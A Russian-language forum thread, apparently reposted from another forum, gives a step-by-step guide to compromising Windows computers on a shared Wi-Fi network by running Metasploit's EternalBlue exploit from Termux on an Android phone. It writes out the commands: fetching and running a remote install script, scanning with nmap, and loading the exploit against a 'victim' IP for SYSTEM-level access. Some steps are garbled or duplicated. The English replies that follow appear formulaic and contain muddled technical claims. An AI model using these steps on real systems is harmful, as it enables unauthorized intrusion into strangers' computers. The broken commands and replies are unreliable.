Termux и exploit eternalblue

[Tipper]

Наверное чуть опоздал, слил тему с stf.st, но в одно время она была без хайда и я эту тему выложили на другой форум. Так что пусть полежит в этом разделе, на данный момент хайд составляет 30 симпатий и 100 сообщений

Spoiler: Link на тему

https://ru.stf.st/threads/8034/

1. Качаем Termux в Google Play.

2. Подключаемся к любой wi-fi сети к которой подключена наша жертва.

3. Приступаем, обновляем все пакеты командами

apt-get update; pkg update; pkg curl update

4. Качаем metasploit

curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh

5. Распаковываем его задавая права для распаковки

chmod 777 metasploit.sh

6. Запускаем установку

chmod 777 metasploit.sh

и ждём примерно 5 минут, зависит от вашего смартфона.

7. После установки метасплоита нам нужно узнать локальные IP компов в вашей сети, для этого воспользуемся nmap'ом (он понадобиться вам потом ещё во многом если я продолжу писать темы по Termux)

8. Установим nmap командой

apt-get install nmap

и сразу после установки проверяем нашу сетку

nmap -sn *адрес роутера*/24

Пример: nmap -sn 192.168.1.1/24 (адресс роутера узнаём командой arp и иногда этой же командой можно найти и компьютеры сразу, но бывает она не работает, поэтому пользуемся nmap'ом)

9. Узнаём свой ip дабы не ошибиться и не применить эксплоит на нас (хотя он в любом случае выдаст ошибку ибо мы со смартфона, а эксплоит для windows). Для про верки нашего ип используем ifconfig

10. Переходим в дерикторию с нужным нам эксплоитом

cd metasploit-framework/modules/exploits/windows/smb

и командой ls смотрим список.

11. Нам нужен данный эксплоит eternalblue.rb, выбираем его командой

cp ms17_010_eternalblue.rb eternalblue.rb

.

12. Так жертву нашли, свой ип знаем, эксплоит тоже нашли, можно приступать к атаке. Включаем метасплоит командой

msfconsole

13. Мы почти у финиша, включаем эксплоит

use exploits/windows/smb/eternalblue.rb

14. Подключаем IP жертвы

set RHOST *тут айпишник*

15. Самый лучший момент!!!

exploit

- и мы получаем доступ к компютеру от имени системы и находимся в командноой строке из котрой можем выполнять просто море действий с жертвой...

Ну вот такой небольшой гайд по данному эксплоиту, он не работает на Windows 10, есть некоторые ситуации в которых он работает, но после обновы осенью и отказа от SMB1 уязвимость перестала работать, если вы смотрели то самое видео овера то он назвал ту самую группу хакеров, благодаря которой эту уязвимость в винде начали резко госить. Но если винду не обновляли с лета 2017 или она пиратка, то уязвимость должна работать, на предидущих версиях работает всё стабильно.

Для последущего применения уязвимости нужно повторять лишь 9 12 13 14 15 шаги и частично 8 шаг, ну я думаю вы разберётесь дальше.

 

[Sicrow]

"Hey, guys! Just wanna say Termux is a solid choice for running this exploit, but like I said in the other thread, make sure you know what you're doing. Anyone else have any success with EternalBlue on Android using Termux?"

 

[Irisss]

Yo, EternalBlue's a classic exploit, been around for ages. If you're planning on using it with Termux, just make sure you're on a rooted device and you've got the necessary permissions set up. Don't expect much though, it's not like it's gonna blow your mind or anything.

 

[RANGERex]

"what's up guys, just wanna say that Termux is a solid Linux environment on Android, and if you're planning on using EternalBlue for research purposes, please make sure you're in a controlled environment with no live systems connected, no? Would be a shame to cause any unintended damage"

 

[sadi2006]

Yeah, Termux is a solid choice for exploiting EternalBlue, its terminal-based interface makes it a breeze to navigate. Been using it for my recent research on Windows Vulns and it's been super helpful. Has anyone else had any luck getting it to work on older Android versions?

 

[Татьяна4245]

"Dude, didn't know Termux had EternalBlue exploit support, thanks for the tip. How stable is it, though? Just curious 'cause I don't wanna brick my phone."

 

[SoULfat]

"Hey guys, what's up with the EternalBlue exploit? From what I recall, it's a patched vulnerability from 2017, and Termux doesn't run kernel modules so it shouldn't be exploitable from my understanding".

 

[sisa43]

"Ya, Termux works pretty slick for exploit stuff, especially if you're trying to stay stealthy. The EternalBlue exploit's been around for a while, but it's still a solid choice if you're looking for remote code execution. Anyone else having issues with stability on Android with this one?"